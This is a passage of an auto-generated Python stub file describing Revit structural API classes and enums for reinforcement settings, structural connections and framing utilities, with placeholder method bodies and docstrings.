#cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Area = None Path = None value__ = None class ReinforcementAbbreviationTag(object, IDisposable): """ This class is used to access the Area or Path Reinforcement abbreviation tag data. It stores abbreviation tag value and abbreviation type. ReinforcementAbbreviationTag(typeTag: ReinforcementAbbreviationTagType, abbreviationTag: str) """ def Dispose(self): """ Dispose(self: ReinforcementAbbreviationTag) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementAbbreviationTag, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, typeTag, abbreviationTag): """ __new__(cls: type, typeTag: ReinforcementAbbreviationTagType, abbreviationTag: str) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass AbbreviationTag = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The abbreviation tag value. Get: AbbreviationTag(self: ReinforcementAbbreviationTag) -> str """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: ReinforcementAbbreviationTag) -> bool """ TypeTag = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The abbreviation tag type. Get: TypeTag(self: ReinforcementAbbreviationTag) -> ReinforcementAbbreviationTagType """ class ReinforcementAbbreviationTagType(Enum, IComparable, IFormattable, IConvertible): """ Defines all types of abbreviation tags for Area and Path Reinforcement objects. enum ReinforcementAbbreviationTagType, values: AreaReinforcementBottomMajor (2), AreaReinforcementBottomMinor (3), AreaReinforcementExteriorMajor (6), AreaReinforcementExteriorMinor (7), AreaReinforcementInteriorMajor (4), AreaReinforcementInteriorMinor (5), AreaReinforcementLayerEachFace (9), AreaReinforcementLayerEachWay (8), AreaReinforcementTopMajor (0), AreaReinforcementTopMinor (1), PathReinforcementAlternating (14), PathReinforcementAlternatingBarOffset (15), PathReinforcementBottom (11), PathReinforcementExterior (13), PathReinforcementInterior (12), PathReinforcementTop (10) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass AreaReinforcementBottomMajor = None AreaReinforcementBottomMinor = None AreaReinforcementExteriorMajor = None AreaReinforcementExteriorMinor = None AreaReinforcementInteriorMajor = None AreaReinforcementInteriorMinor = None AreaReinforcementLayerEachFace = None AreaReinforcementLayerEachWay = None AreaReinforcementTopMajor = None AreaReinforcementTopMinor = None PathReinforcementAlternating = None PathReinforcementAlternatingBarOffset = None PathReinforcementBottom = None PathReinforcementExterior = None PathReinforcementInterior = None PathReinforcementTop = None value__ = None class ReinforcementBarOrientation(Enum, IComparable, IFormattable, IConvertible): """ Describes the bar orientation at Path Reinforcement. enum ReinforcementBarOrientation, values: BottomOrInterior (2), FarSide (3), NearSide (1), TopOrExterior (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrInterior = None FarSide = None NearSide = None TopOrExterior = None value__ = None class ReinforcementRoundingSource(Enum, IComparable, IFormattable, IConvertible): """ An enumerated type listing the possible sources for reinforcement rounding overrides. enum ReinforcementRoundingSource, values: Element (3), None (0), ReinforcementSettings (1), Type (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Element = None None = None ReinforcementSettings = None Type = None value__ = None class ReinforcementSettings(Element, IDisposable): """ Provides access to project-wide reinforcement settings. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetFabricRoundingManager(self): """ GetFabricRoundingManager(self: ReinforcementSettings) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings used by FabricSheetType and FabricSheet elements. Returns: The rounding manager. """ pass def GetRebarRoundingManager(self): """ GetRebarRoundingManager(self: ReinforcementSettings) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings used by RebarBarTypes, Rebar and RebarInSystem elements. Returns: The rounding manager. """ pass def GetReinforcementAbbreviationTag(self, tagType): """ GetReinforcementAbbreviationTag(self: ReinforcementSettings, tagType: ReinforcementAbbreviationTagType) -> str Gets one abbreviation tag for desired ReinforcementAbbreviationTagType. tagType: Defines the type of abbreviation tag. Returns: Abbreviation tag value """ pass def GetReinforcementAbbreviationTags(self, objectType): """ GetReinforcementAbbreviationTags(self: ReinforcementSettings, objectType: ReinforcementAbbreviationObjectType) -> IList[ReinforcementAbbreviationTag] Gets a list of abbreviation tags for desired reinforcement object type. objectType: Defines the type of desired reinforcement object for abbreviation tags. Returns: An array of ReinforcementAbbreviationTag that will define all abbreviations for given reinforcement object. """ pass @staticmethod def GetReinforcementSettings(cda): """ GetReinforcementSettings(cda: Document) -> ReinforcementSettings Obtains the ReinforcementSettings object for the specified project document. cda: A project document. Returns: The ReinforcementSettings object. """ pass def IsEqual(self, other): """ IsEqual(self: ReinforcementSettings, other: ReinforcementSettings) -> bool Checks if Reinforcement Settings is equal to other """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetReinforcementAbbreviationTag(self, tagType, abbreviationTag): """ SetReinforcementAbbreviationTag(self: ReinforcementSettings, tagType: ReinforcementAbbreviationTagType, abbreviationTag: str) Sets one abbreviation tag for desired ReinforcementAbbreviationTagType. tagType: Defines the type of abbreviation tag. abbreviationTag: Abbreviation tag value to set. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass HostStructuralRebar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Host Structural Rebar within Area and Path Reinforcement with touching AtomHostStructuralRebar. Get: HostStructuralRebar(self: ReinforcementSettings) -> bool Set: HostStructuralRebar(self: ReinforcementSettings) = value """ NumberVaryingLengthRebarsIndividually = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Use this option to modify the way varying length bars are numbered (individually or as a whole). Get: NumberVaryingLengthRebarsIndividually(self: ReinforcementSettings) -> bool Set: NumberVaryingLengthRebarsIndividually(self: ReinforcementSettings) = value """ RebarPresentationInSection = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The default presentation mode for rebar sets, when: The view direction is perpendicular to the rebar normal and the rebar set is cut.The view direction is not perpendicular to the rebar normal and the view direction is not parallel to the rebar normal. Get: RebarPresentationInSection(self: ReinforcementSettings) -> RebarPresentationMode Set: RebarPresentationInSection(self: ReinforcementSettings) = value """ RebarPresentationInView = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The default presentation mode for rebar sets, when the view direction is perpendicular to the rebar normal and the rebar set is not cut. Get: RebarPresentationInView(self: ReinforcementSettings) -> RebarPresentationMode Set: RebarPresentationInView(self: ReinforcementSettings) = value """ RebarShapeDefinesEndTreatments = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """End Treatments are defined by Rebar Shape of Rebar element. Can be changed if document contains no rebars, area reinforcements and path reinforcements. Get: RebarShapeDefinesEndTreatments(self: ReinforcementSettings) -> bool Set: RebarShapeDefinesEndTreatments(self: ReinforcementSettings) = value """ RebarShapeDefinesHooks = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Hooks are defined by Rebar Shape of Rebar element. Can be changed if document contains no rebars, area reinforcements and path reinforcements. Get: RebarShapeDefinesHooks(self: ReinforcementSettings) -> bool Set: RebarShapeDefinesHooks(self: ReinforcementSettings) = value """ RebarVaryingLengthNumberSuffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unique identifier used for a bar within a variable length rebar set. Get: RebarVaryingLengthNumberSuffix(self: ReinforcementSettings) -> str Set: RebarVaryingLengthNumberSuffix(self: ReinforcementSettings) = value """ class ReleaseType(Enum, IComparable, IFormattable, IConvertible): """ The release type. enum ReleaseType, values: BendingMoment (2), Fixed (0), Pinned (1), UserDefined (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BendingMoment = None Fixed = None Pinned = None UserDefined = None value__ = None class StickElementExtension(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Extension. enum StickElementExtension, values: BottomOrTop (0), Plane (2), ReferenceLevel (1), Varies (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrTop = None Plane = None ReferenceLevel = None value__ = None Varies = None class StickElementProjectionY(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection. enum StickElementProjectionY, values: Center (2), Left (1), LocationLine (0), Plane (4), Right (3), Varies (5) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Center = None Left = None LocationLine = None Plane = None Right = None value__ = None Varies = None class StickElementProjectionZ(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection. enum StickElementProjectionZ, values: Bottom (3), Center (2), LocationLine (0), Plane (4), Top (1), Varies (5) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None Center = None LocationLine = None Plane = None Top = None value__ = None Varies = None class StirrupTieAttachmentType(Enum, IComparable, IFormattable, IConvertible): """ An enumerated tye that represents how the Stirrup/Tie rebar is attached to the cover reference. enum StirrupTieAttachmentType, values: ExteriorFace (1), InteriorFace (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ExteriorFace = None InteriorFace = None value__ = None class StructuralConnectionApplyTo(Enum, IComparable, IFormattable, IConvertible): """ An enumerated type that represents the type of structural locations to which a connection annotation may be applied. enum StructuralConnectionApplyTo, values: BeamsAndBraces (0), ColumnBase (2), ColumnTop (1), Connection (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BeamsAndBraces = None ColumnBase = None ColumnTop = None Connection = None value__ = None class StructuralConnectionApprovalType(ElementType, IDisposable): """ A type element that represents a connection approval type. """ @staticmethod def Create(doc, name): """ Create(doc: Document, name: str) -> StructuralConnectionApprovalType Creates a new StructuralConnectionApprovalType. name: A name for the new approval type. It must be unique within the document. Returns: Created connection approval type. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass @staticmethod def GetAllStructuralConnectionApprovalTypes(cda, ids): """ GetAllStructuralConnectionApprovalTypes(cda: Document) -> ICollection[ElementId] """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def IsValidApprovalTypeName(doc, name): """ IsValidApprovalTypeName(doc: Document, name: str) -> bool Verifies if the provided approval name is unique in the document. Returns: True if approval type name is unique. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class StructuralConnectionCodeCheckingStatus(Enum, IComparable, IFormattable, IConvertible): """ An enumerated type listing all code checking status of the structural connection element. enum StructuralConnectionCodeCheckingStatus, values: CheckingFailed (2), NotCalculated (0), OkChecked (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass CheckingFailed = None NotCalculated = None OkChecked = None value__ = None class StructuralConnectionHandler(Element, IDisposable): """ An object of Structural Connection Handler. """ def AddElementIds(self, elemIds): """ AddElementIds(self: StructuralConnectionHandler, elemIds: IList[ElementId]) """ pass @staticmethod def Create(document, idsToConnect, typeId=None): """ Create(document: Document, idsToConnect: IList[ElementId]) -> StructuralConnectionHandler Create(document: Document, idsToConnect: IList[ElementId], typeId: ElementId) -> StructuralConnectionHandler """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetConnectedElementIds(self): """ GetConnectedElementIds(self: StructuralConnectionHandler) -> IList[ElementId] Retrieves list of element ids of connected elements. Returns: Returns connected element ids. """ pass def GetOrigin(self): """ GetOrigin(self: StructuralConnectionHandler) -> XYZ Retrieves origin point of Structural Connection Handler element. Returns: The origin point of element. """ pass def IsDetailed(self): """ IsDetailed(self: StructuralConnectionHandler) -> bool Checks if Structural Connection Handler has the detailed connection style. Returns: True if Structural Connection Handler has the detailed connection style. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveElementIds(self, elemIds): """ RemoveElementIds(self: StructuralConnectionHandler, elemIds: IList[ElementId]) """ pass def SetDefaultPrimaryElement(self): """ SetDefaultPrimaryElement(self: StructuralConnectionHandler) Sets primary element in connection according to structural categories, element materials and geometries. The steel element is set rather than an element of other material. The priorities of the elements are set according structural categories in following order: columns, framings, walls, foundations, floors. In case of several Structural Framing elements order is determined by cutting - the cutting element is set as the primary one rather than element being cut. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApprovalTypeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieves or changes approval type of the Structural Connection Handler. Get: ApprovalTypeId(self: StructuralConnectionHandler) -> ElementId Set: ApprovalTypeId(self: StructuralConnectionHandler) = value """ CodeCheckingStatus = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Code checking status of the structural connection. Get: CodeCheckingStatus(self: StructuralConnectionHandler) -> StructuralConnectionCodeCheckingStatus Set: CodeCheckingStatus(self: StructuralConnectionHandler) = value """ SingleElementEndIndex = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Element end index for single element connections (0: start, 1: end). Get: SingleElementEndIndex(self: StructuralConnectionHandler) -> int Set: SingleElementEndIndex(self: StructuralConnectionHandler) = value """ class StructuralConnectionHandlerType(ElementType, IDisposable): """ A StructuralConnectionHandlerType is used in StructuralConnectionHandler element generation. """ @staticmethod def Create(pADoc, name, guid, familyName): """ Create(pADoc: Document, name: str, guid: Guid, familyName: str) -> StructuralConnectionHandlerType Creates a new StructuralConnectionHandlerType object. pADoc: The document. name: The type name. guid: Connection GUID. familyName: Name of system family which created type will belong to. Returns: The newly created instance. """ pass @staticmethod def CreateDefaultStructuralConnectionHandlerType(pADoc): """ CreateDefaultStructuralConnectionHandlerType(pADoc: Document) -> ElementId Creates a new StructuralConnectionHandlerType object with a default name. pADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetDefaultConnectionHandlerType(pADoc): """ GetDefaultConnectionHandlerType(pADoc: Document) -> ElementId Gets a default type id for Structural Connection. pADoc: The document. Returns: The type id. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ConnectionGuid = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The GUID to use for identifying connection geometry generation algorithm. Get: ConnectionGuid(self: StructuralConnectionHandlerType) -> Guid """ class StructuralConnectionSettings(Element, IDisposable): """ Provides access to project-wide structural connections settings. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetStructuralConnectionSettings(document): """ GetStructuralConnectionSettings(document: Document) -> StructuralConnectionSettings Obtains the StructuralConnectionSettings object for the specified project document. document: A project document. Returns: The StructuralConnectionSettings object. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass IncludeWarningControls = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """This property controls how Structural Connection Element is generated. If set to true and warnings are reported for given Element, additional yellow triangle is displayed. Get: IncludeWarningControls(self: StructuralConnectionSettings) -> bool Set: IncludeWarningControls(self: StructuralConnectionSettings) = value """ class StructuralConnectionType(ElementType, IDisposable): """ A type element that represents a connection symbol applied to structural members. """ @staticmethod def Create(doc, applyTo, name, familySymbolId): """ Create(doc: Document, applyTo: StructuralConnectionApplyTo, name: str, familySymbolId: ElementId) -> StructuralConnectionType Create a new StructuralConnectionType, allowing the specified annotation FamilySymbol to be applied to structural members. applyTo: Specify which type of member this connection type can be applied to. name: A name for the connection type. It must be unique within the document. familySymbolId: The id of an annotation FamilySymbol. InvalidElementId is allowed. Otherwise, the FamilySymbol must be in the category "Connection Symbols" (OST_StructConnectionSymbols) and have its "Apply To" parameter set to match the applyTo argument. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass @staticmethod def GetAllStructuralConnectionTypeIds(cda, ids): """ GetAllStructuralConnectionTypeIds(cda: Document) -> ICollection[ElementId] """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetFamilySymbolId(self): """ GetFamilySymbolId(self: StructuralConnectionType) -> ElementId FamilySymbol of the annotation to use for this connection type. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetFamilySymbolId(self, familySymbolId): """ SetFamilySymbolId(self: StructuralConnectionType, familySymbolId: ElementId) FamilySymbol of the annotation to use for this connection type. """ pass @staticmethod def ValidFamilySymbolId(doc, applyTo, familySymbolId): """ ValidFamilySymbolId(doc: Document, applyTo: StructuralConnectionApplyTo, familySymbolId: ElementId) -> bool Checks whether the family symbol id is allowed for StructuralConnectionTypes with the given value for the applyTo property. Returns: True if %familySymbolId% is invalidElementId; or if it is the id of a FamilySymbol of category "Connection Symbols" (OST_StructConnectionSymbols) with its "Apply To" parameter set to match the applyTo property. Returns false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApplyTo = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Choose whether this connection type applies to beams and braces, to tops of columns, or to bases of columns. Get: ApplyTo(self: StructuralConnectionType) -> StructuralConnectionApplyTo """ class StructuralFramingUtils(object): """ A collection of Structural Framing Utilities. """ @staticmethod def AllowJoinAtEnd(familyInstance, end): """ AllowJoinAtEnd(familyInstance: FamilyInstance, end: int) Sets the indicated end of the framing element to be allowed to join to others. familyInstance: The FamilyInstance, which must be of a structural framing category. end: The index of the end (0 for the start, 1 for the end). """ pass @staticmethod def CanFlipEnds(familyInstance): """ CanFlipEnds(familyInstance: FamilyInstance) -> bool Determines if the ends of the given framing element can be flipped. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete. Returns: True for non-concrete line, arc or ellipse framing element, false otherwise. """ pass @staticmethod def CanSetEndReference(familyInstance, end): """ CanSetEndReference(familyInstance: FamilyInstance, end: int) -> bool Determines if a reference can be set for the given end of the framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined at the given end. end: The index of the end (0 for the start, 1 for the end). Returns: True if reference can be set for the given end of the framing element. """ pass @staticmethod def DisallowJoinAtEnd(familyInstance, end): """ DisallowJoinAtEnd(familyInstance: FamilyInstance, end: int) Sets the indicated end of the framing element to not be allowed to join to others. familyInstance: The FamilyInstance, which must be of a structural framing category. end: The index of the end (0 for the start, 1 for the end). """ pass @staticmethod def FlipEnds(familyInstance): """ FlipEnds(familyInstance: FamilyInstance) Flips the ends of the structural framing 